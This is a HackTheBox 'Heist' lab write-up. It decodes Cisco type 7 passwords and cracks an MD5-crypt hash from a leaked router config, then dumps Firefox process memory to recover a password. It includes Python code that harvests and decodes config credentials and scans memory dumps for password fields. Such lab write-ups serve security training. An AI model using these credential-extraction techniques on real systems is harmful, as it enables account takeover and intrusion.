HackTheBox - Heist


In this machine I used nmap, Evil-WinRM, psexec.py, John, smbmap, enum4linux, crackmapexec, lookupsid.py and procdump.exe.

First of all, I ran a quick nmap scan of the top ports:

image.png

Following this I did some quick SMB checks using smbmap and enum4linux:

image.png

I could not authenticate, so I needed to enumerate usernames. I decided to visit the open HTTP port.

I had a quick look through dev tools and found nothing interesting, but there is a "login as guest" button:

image.png

Upon logging in we find a username we can save for later, as well as a Cisco router configuration file:

image.png

Looking through the config we can identify some hashes for potential credentials:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

There is one type 5 hash and two type 7 strings. Type 5 (the $1$ prefix) is MD5-crypt, a salted hash that has to be cracked. Type 7 is not a hash at all: it is a reversible obfuscation with a fixed, well-known key, so it can be decoded directly.

We can crack the type 5 hash with John (format md5crypt; the equivalent hashcat mode is 500):

image.png

The type 7 strings can be decoded with an online type 7 decoder (no cracking needed):

image.png
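Because type 7 is reversible, the decode can just as well be done offline. The following Python decoder is an added example and not part of the original write-up: TYPE7_KEY is Cisco's fixed, publicly documented XOR key, and harvest() runs over the credential lines of the config shown above (the enable secret and the two username lines). The type 5 hash is returned untouched, since MD5-crypt must be cracked rather than decoded.

```python
import re

# Cisco "type 7" passwords are not hashes. Each character is XORed with a byte
# from this fixed, publicly documented key; the first two digits of the string
# are the decimal offset into the key at which XORing starts.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(encoded: str) -> str:
    """Recover the plaintext from a 'password 7 <hex>' string."""
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("type 7 strings are an even number of hex digits, at least 4")
    seed = int(encoded[:2], 10)                      # starting offset into TYPE7_KEY
    if not 0 <= seed < len(TYPE7_KEY):
        raise ValueError("seed out of range for the type 7 key")
    body = bytes.fromhex(encoded[2:])                # one ciphertext byte per plaintext char
    plain = bytes(c ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, c in enumerate(body))
    return plain.decode("ascii")                     # non-ASCII here means a corrupted string


def type7_encode(plaintext: str, seed: int = 2) -> str:
    """Inverse of type7_decode; handy to confirm a decode round-trips."""
    if not 0 <= seed < len(TYPE7_KEY):
        raise ValueError("seed out of range for the type 7 key")
    data = plaintext.encode("ascii")
    body = bytes(c ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, c in enumerate(data))
    return f"{seed:02d}{body.hex().upper()}"


# "username <name> [privilege N] password 7 <hex>" and "enable secret 5 <md5crypt>".
USERNAME7_RE = re.compile(r"^username\s+(\S+).*?\bpassword\s+7\s+([0-9A-Fa-f]+)", re.M)
SECRET5_RE = re.compile(r"^enable secret 5\s+(\$1\$\S+)", re.M)


def harvest(config: str) -> dict:
    """Pull credentials out of an IOS config. Type 7 strings are decoded on the
    spot; type 5 hashes (MD5-crypt, '$1$' prefix) are returned as-is for
    offline cracking (john --format=md5crypt or hashcat -m 500)."""
    return {
        "type7": {user: type7_decode(enc) for user, enc in USERNAME7_RE.findall(config)},
        "type5": SECRET5_RE.findall(config),
    }


# The credential lines taken from the config above.
CONFIG_EXCERPT = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    creds = harvest(CONFIG_EXCERPT)
    for user, password in creds["type7"].items():
        print(f"{user}: {password}")
    for digest in creds["type5"]:
        print(f"enable secret (crack offline): {digest}")
```

Both username lines in this config use seed 02, which is why they start with the same two digits; type7_encode with the default seed reproduces the original strings exactly, a quick sanity check that the key constant is right.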

After decoding, I tested the recovered passwords against the known users with crackmapexec:

image.png

With my new SMB credentials, time to try smbmap again:

image.png

I then ran the command again with -R to list all files recursively:

image.png

As IPC$ is the share used for interprocess communication (RPC over named pipes), we can connect to it with rpcclient:

image.png

To save time I used Impacket's lookupsid.py, which brute-forces RIDs to enumerate domain users and groups:

image.png

With the newly obtained users I ran crackmapexec again:

image.png

Connect with Evil-WinRM:

image.png

Get the user flag:

image.png

Privilege escalation:

Typing ps I saw multiple instances of Firefox running:

image.png

As Firefox stores its profile data under AppData, I went to investigate:

image.png

To identify which process to target: the instance with the highest resource usage is most likely the active browser.

image.png

Dumping the Firefox process memory with procdump.exe:

image.png

Downloading the Firefox dump:

image.png

Downloading was taking too long, so I decided to use findstr on the dump directly:

image.png

Looking through the output:

image.png
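One caveat when grepping a process dump: findstr only matches the byte encoding you typed, and Windows processes frequently hold strings in memory as UTF-16LE (each ASCII character followed by a 0x00 byte), which a plain search for "password=" never hits. The scanner below is an added example, not part of the original write-up; SAMPLE_DUMP is a constructed stand-in for a real dump, and the user name and values in it are invented.

```python
import mmap
import re
from urllib.parse import unquote

# A form-field style credential, e.g. "login_password=<value>&": the value runs
# until '&', whitespace or a NUL byte.
ASCII_RE = re.compile(rb"password=([^&\s\x00]+)")
# The same field as a Windows process usually keeps it in memory: UTF-16LE, so
# every character is followed by 0x00. findstr "password=" never matches this.
WIDE_RE = re.compile(rb"p\x00a\x00s\x00s\x00w\x00o\x00r\x00d\x00=\x00((?:[^&\s\x00]\x00)+)")


def find_passwords(dump) -> list:
    """Return (encoding, value) for every password field in a raw dump,
    URL-decoded so '%21' comes back as '!'. Accepts bytes or an mmap."""
    hits = []
    for m in ASCII_RE.finditer(dump):
        hits.append(("ascii", unquote(bytes(m.group(1)).decode("ascii", "replace"))))
    for m in WIDE_RE.finditer(dump):
        hits.append(("utf-16le", unquote(bytes(m.group(1)).decode("utf-16-le"))))
    return hits


def scan_file(path: str) -> list:
    """Scan a procdump .dmp without reading the whole file into memory."""
    with open(path, "rb") as fh:
        with mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as mm:
            return find_passwords(mm)


# Constructed sample, not a real dump: an ASCII HTTP request line, some filler,
# and one UTF-16LE copy of a form field of the kind findstr would miss.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"GET /login.php?login_username=alice%40example.com&login_password=Winter2024%21 HTTP/1.1\r\n"
    + b"\x90" * 16
    + "login_password=Hunter2".encode("utf-16-le")
    + b"\xff" * 16
)

if __name__ == "__main__":
    for encoding, value in find_passwords(SAMPLE_DUMP):
        print(f"[{encoding}] {value}")
```

scan_file() is what you would point at the downloaded .dmp; the two regexes are the same thing findstr was doing, plus the wide-string form and URL-decoding of the captured value.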

Using psexec.py to test the credentials:

image.png

image.png